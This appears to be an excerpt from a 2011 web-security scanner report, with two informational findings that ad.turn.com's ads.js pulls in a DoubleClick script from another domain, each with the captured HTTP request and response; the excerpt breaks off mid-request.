Set-Cookie: pf=04PuXErPV-GICzzv_vjLB8Z-FqDydq8bkdsK7TsWic6S04H7stKnZdMqlx3yK2bUyKo3hhEaKX7IoPZ-lmhnW5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:24:00 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
eNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=7659056942280430237?;click=http://r.turn.com/r/tpclick/id/nVIdp7VvSmpLCQoABgIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.31. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=rTkLkqau0QYxEN8cNaNZ1540fgUNTQEFI_-TsQris_yUrlPSSsigYRzdV-ftYQYrNyl8nUEbZUM81SBCKCjJVa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ykFEGLiLwCfrF_l8MZMrUPZcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFQ1hyEc2EaR6nmDIgRgRYe5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRN3AAEYgcK5QPQHd4Gc9VYh_kTRQqV9eMU3w&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=0krt7pECH8f4AUkPMfPLxNAr0dEyNgkKmFB5H7cnjGLDlGIUOWYS4TNj-1gj_XcuxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIFsDfM2NXKITtK5mEB67uG6cnJ8KBYgKUktokmqS3LjssnDIVNl5s8p6BWhDRQOG1Y1QTmhSKBBfCiPR2XvN6a6VdA-aRZXmNDP7lSI2wQSGx5v0cV6H6qtinx1Q704l-oUMjpIXpB6il7FFbzULWw5owoppYQSGwYQ5BfDbDCXy7HaUnluhwvfAdxnu7dyaxuyYLZMG4wQKFopdYuz1yBkTjkCmowViAePMRyVPxPzlfGp9uLaSbmsFulcqR4MLdwCFGRMny4v-4Ds-xWhNSYnNvHc1u2FfaaVBP8uYfPQfqxkCNFN8XdDxnx0YUA_3_mJDs89nd4Ymqut34z12EKAQQ0XtSgyP9-pRtjKBA9CwzM3FOMa0O1QUooBe9oKQ-Zjw1q3jr96MmE73EdnErm38YriNnAPqrwti3Wg6OhdHY00Dl81uL0cu5Q6kIArODaj37arSozuBgqeZjp8etrKPwTSy9iaxr-86fHYsP3kCoKqMVJJLJFDSB1wQojnNFKkGl9xikTxa0vI9mU1SXUh8CBkO6GkBHkeKwDk3LOZRA8ZmyZijY6_JnGie9hFbVX_nt60k_c8nKVgiqmQKtbIsDf_Pg2Vk_EWg-3dTD9pFa_rO01fMzute_fYySUOw29_-4Q9nZqsY5R2PvJYgjAN0GkbFYUQAsda9MPjdcAf4vJjfmIp4TIVEpaTTrJtL8xV0D5pFleY0M_uVIjbBBIbAWMjqLBOCe9VVjMvOiSQrwRzaM85XOnnIs3YsAXTRuB0vobXYP71SE5qK-q8G4NqymsOAZ_ZZzNB9X-4LMkX7LJgtkwbjBAoWil1i7PXIGR9EM30P5U0hfSiCS3ai_9HOwiGbZycrdghgM4PLmqoFcr5JF0uF3_61PJqBYJpzzCnUhdwVsCxTJUZM0zzFL-GQQ0XtSgyP9-pRtjKBA9Cw3NA3NLeN-dqw7TfckMUrtZjw1q3jr96MmE73EdnErm3DDcSEX45GYe-BefdalTg1TcqJM5Z0esfZTBDm1i5g02j37arSozuBgqeZjp8etrKAc1Kh9i4VqWmH-WjZpleKYKqMVJJLJFDSB1wQojnNFL3x8B4wkuG2roHzuh5_jmyQ_I_YIZ3XqvyWF_ra-KXfVpWMEHqaABO2DzKH5eC2_brzVFOQNUm4X8Ov5z_xEqQSrT3g-RzCp2Y9_RlOxNr-ys9Q4Vv2M-68gmzVv1FrQ9qufQ3amnZDFmzEFsBUDI9pcq4mYGsFa2vGdUtarzDcE-2wokPkAlCyjlgMdxBJ7qB7iSDyvObI9Sl6zl5fzQq55TmIj-LLHE4_nQH38JlYn3rm--dL65XS9oD2kwF5AMIsJpQJ3PhWZ2XtnJE031cfklVSiEH91alc83RKEOLHQseC4elKYmGBtaPL3JeZkD_VRlSZ63nc8pWYmEgwvFTiVNCusU3aZUiKmlso65aOCocTugTwKeprUG3neYANAo4J6ekcOZZgLFNOzedSuY9z2Us8axPZDf7mRaLxnzkYR-jKB9Z9Zi8dlEkmb9sfPxxhEj2iEnMXn4ojzStDglBuTHZ0UJYMFG8VP9AbV8tMnfFltleNrfiBYQXvcmkhcNf7aVuC9ut9s_z1sPrN4P5RoKOi2YNHd8ZQWu6HEH7d3YBbJkXGA64A1Px9H-Ds6pJnwjklmnl59Da-S-hTRcXxXdoEcPfDHWNu_wu-UkE9xeP1juzVgZLdKkLnjgbxd10zNEI9IunejXvkjKPWUVt-Jy9hPHX1COKiv94U7eufztYpVDv6iB6ejLs3P5WtVP9jo4gDlOzxG7lpvOKXuUxKdPncB-LhhfwxBeh74YKLm6h2REpqstP7lKKO2gLjjWd12zyNpTwTtHsPf22kN4hhck2zZZRltvukjy_mM_-b9Fz5EjryO5GEnXNfQp6Ennr5ujrAVvnEH0lj-uyLApzdyd0SuxyeOwzsFIIpJAAO9pctXTi7tWZA3KABfGHhkV_5au42d9ia7oBgo1CLqjJMi6E0GGiHPbluPGXDbtnIiC7T_sitScsLL2BYqjJVfYBydhF0pZHR2D0BzPZ6gdhOx6hrcrnNzn805ZIttSJHndJeWJm9m5rR9osjbmyRrEisP86hfkI5xuPzXsWWGmFnUnScVaKAjoISxWQSp_9BEDtrwK3tthfJZ0psng3M2u2BqIFpXZGk9bucdxN-sV6zUu6PrkJPZ5feenRTNHJS734dy2QIXiLHCObftj54ePoGsTMVJDxYNjK13tk7ukWWCv3ifN7G1W2YJODJtsY74Fu_jktOcHL8hhwbCcPatQmGfiihlQ8xz5fc5c-wrpVeSFarToM8R2WlRziHRECDowm7-i7OFvu5eoWYnoeR-aXyb89P8adLvUq9zsPtJXoXsySa9pfLW8tPPgcsLr2RccjOLKJmYrucZDWUNef1OkaaPlHFfpKoHWtyP0Sulwfxvpz5mhO8B6jCUN_hJsThb383eWA9Onz1TWdS0wWTeJ4c9q2DhXMqRVdB0eEURyz; fc=6SF-YrQOlWG6b0iP2-2NsulxE4c6zsGn5TjI9kzSipVsfhME3rZv57cIF8eaDH532g9tsxB_asXrCmB8yAZFhCEVuEBWF2BJd4O6JLUjzhssvZVnwB7P1iHAZlWSX3sfJZqwGp_HFwjoMxL9MoaRMjZ3Kye3PAFmP6IoQLIRtH0LcIqy0z9VGWKwxmaKKQ8XnLbzR0hp8geuo9g-ix58aWe7XKhMRutfkMpZuWUsim-qONPAcUfbmswfIykg5y75; pf=f8YBhRYNj3H2e_gk6nfKRkFMgeWwkakQS2GmgtPhUbYIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtNe4ZHXq7leG0WnIaAM7NfPB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:20:45 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=wMdN3IA4Gj6r2JeEG2Scom1vMTqPvhqCchn_dwIVK3bAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIEbneS3P1jt3L2TU8DfXrAaO93Hmpqold0I45kSWFpZUdBpGxWFEALHWvTD43XAH-IISjk4v2YhwfWhYQtvWgYgVdA-aRZXmNDP7lSI2wQSGymRCuiX3msEf9Zx7_6oXdHFf3tE5HaJy7RuA2Rf6LYdaupG0mP-ALWuA6T1v3SoZ6tsowBc5pDAMyPtooX8bZ-yYLZMG4wQKFopdYuz1yBkr0NceN6dcXfCMb4qxb1ERCcJYAYD6EJQRZIEqwxwbz_yU6FIdm7osa-pnXnLvWEHNvHc1u2FfaaVBP8uYfPQfuUSZnolg2Mpi0PobZmvQDOteZNpUmAWLLBJZU75gkasQQ0XtSgyP9-pRtjKBA9Cwz2-4R9q34tPG7_LuWX_-aNjw1q3jr96MmE73EdnErm31cGBaFvfPGmIk78ZSjniU14SZgXhN6QRQnmxfn_Dr0Sj37arSozuBgqeZjp8etrKTdm0m9YtM5QtSe1bVf3R9YKqMVJJLJFDSB1wQojnNFLul7Qf_CirYJ-2QPYzq4yhsN0iuvZzF2TN72AdplWiGw8ZmyZijY6_JnGie9hFbVWeVYVArdJUjqkVsoRhZx5NsDf_Pg2Vk_EWg-3dTD9pFTjLDlon4jl8OOYYJTu_NA2U7H715d1gC9l-sZbJovak0GkbFYUQAsda9MPjdcAf4rBmUpt5y4rpKeABCF5QVHZV0D5pFleY0M_uVIjbBBIb9xT-csezj6lwXj_Nmdt2seLQXpLB6S1HBINAWF7E-PHgGmzu9XVcy87K21WiFWA7eN32Cn9-yoSfhGoimhWR97JgtkwbjBAoWil1i7PXIGRwNeiC56J41DeOs0h4Jdxf3U9yID4iMwKKBdWV0IWb4TfoQpcwAkPV_qYEXL4IsHf7dumssffcgoAlY6D2cXtVQQ0XtSgyP9-pRtjKBA9CwyrXT4Jtn4VTomBGSvjPUlhjw1q3jr96MmE73EdnErm3uasuleILtl5vfSa5So8yJ9SNrmRJCF3Pym6bROG15rEJXP1NEAEZrQLuU5tQYJdPZM1f6dELuAO8KtDRpqB5gmeMi1_n57x6YbK1sWcZupAhILP-pxiHcDJ1yFRsxk-TpsurtJYm25B4wm31tw5WHUD1RI5tHbziFyffCyec3xGAUJ346hmYbpDuUQ4oKjAiuL-2hbuln5AhIPfoFUF_EOHEnUDigVg1M2ynf_Wev9WX3kdiLElhX_nAiyZmBTfdm-XlB5QoWysyF-Y7Hf1MZXBheiAjiFf5UzegIuH4PUQO-ze74swfA11CtF02V_39E9eoWE0gjO__pRMYYCNos0id5u8voWars0ao_qpATqNv_nBNy4ucZg6Y4GMkS-Uy8QQogP__eeWKX_QyF6ZbfYlb808DY-4xpXvlG467_nOUxOanVNnn4gjMy4MXX_SYFgsT-Nyw6KA-UjtAzGx3ST26t-B9xRBN7mU2hlplarkFg1XBpthQ9HeAKEBf7kLSFRszfmYYe7Uvism5tsd-daY69ooDGZ3MpHXJdraprT7FOexOskvdKO4Nn35_FhBwTIvlSRAKdhdfTf_oLe9lSCovVmdibgj-eMxLBiVi9XaDpNlPu8OR8iP58nJcBcTfVBGx3ns03mUvCZAJm2YFEhr_SLCdfj6RZeVGuJjlpic4ukWbG8MrCkW6W1TNM51xyxUVFhCvn0Tsd2NN9Zg8CyVNSFbYT5i7EXUVsdX8VTpF6b_wTUKzPif6s4UsPRj5Xq329VWKuLUk8yR2TvuJlbPnSCsBMPzFM2TT622lUby3hrchtrkdVv94MMYvLFr_QqjhVA8noDmAMG3mRsWKcAWLEnchZRjNygyTywHm2OJOtAGVx_Q0nNelONr6KGG7VcX71eFucJce-UVDjth4kBZtDZf5aNFW5vne7J0GifHJC9Q26Zmd945oWbNmUqXPynv7-EjJb1GgH4fe1ui1I38Lrlk2aw4cliTmTdJH5kbLRf7BMVwcZSGDzwm2Qf_W4QVN6Lw-cKLO8HW5YV58k9EmBovamd8o5wXzBFcJNgrTgOkCvP7Ms3Fd5TPD_21_ejEQEJbqeXQUkzlYFcpDfg3SVkp2FuVxIrMGA3hfolqzE6cYcSZIw5Uge7dI3IPUCqdnj0RzdD__y88TuHkXTWbqfXJR9tgKEcSYsF5AX81Jta6gkfeXbpfsrmLzagraPNlNQ7J9TajAB7jF_keXq7ipPVd-EbmqZHsO7WXJvyIS0LUxtihMHYGwWwPA1JQL2IPKnquMNSJ2dSU9GU0v6gIXPR87vyMdp2dqCEd60B_1OnYdcYkjhrAnU-9dGVkZrkW95fREPDVij03vj6W4YsDRmROKtAdqTEo6ecRSen_KPX3qjSxDK7eb-eT6Hy4rJW1Y4ARYPqBC-WuBQ54IPnkbgv_bB-Nmf2BwkRnorhiE47RUKLg2hVWexVlrcySxjLiP3S7m3-9MWoRkGSwVlp3hdA59kr-DRGiUI8UincYYJ-MDe6abpHIdnYqv2T4X; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: fc=UvO6miSA7srWaSUFmeMCcpUTZjrhTTWDDAvcQFQBnA_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBNf-jvyPTWZaxMWGxN7lkboTgByV_ewuIYjgH3E0_oqobAomfI1NdN8_rfrRwVG6-YVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: pf=0O0Evp5LqFqqor_WKvU5V8b90v2rJtW6tPaq4hh8j0wIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtLMm4306x4iI_gVgxycj0XjB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:20:45 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
r5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.32. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdb